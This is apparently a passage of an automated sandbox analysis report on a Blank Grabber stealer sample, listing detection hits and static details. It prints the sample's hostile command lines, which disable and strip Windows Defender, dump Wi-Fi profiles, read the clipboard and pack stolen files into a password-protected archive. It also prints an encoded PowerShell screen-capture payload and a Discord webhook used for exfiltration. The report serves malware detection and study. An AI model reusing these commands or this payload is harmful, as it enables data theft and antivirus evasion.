gACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 5632, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", ProcessId: 7708, ProcessName: cmd.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8788, TargetFilename: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *, ProcessId: 8296, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7716, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7840, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7500, ProcessName: cmd.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Found malware configuration
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe.7656.2.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC"}
              Multi AV Scanner detection for submitted file
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeReversingLabs: Detection: 57%
              Machine Learning detection for sample
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,72_2_00007FF71D2C901C
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdbhP source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770892655.00007FF8E7290000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdb source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6DA1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000048.00000000.1631513880.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1774041313.00007FF8E795B000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776891927.00007FF8F6DA1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773840617.00007FF8E75B1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775280182.00007FF8F0941000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776711949.00007FF8F5851000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776445085.00007FF8F1DF1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775912815.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772235361.00007FF8E7361000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7B110842C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10F8AF0 FindFirstFileExW,FindClose,0_2_00007FF7B10F8AF0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7B11124C4
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7B110842C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,72_2_00007FF71D2D46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D3188E0 FindFirstFileExA,72_2_00007FF71D3188E0
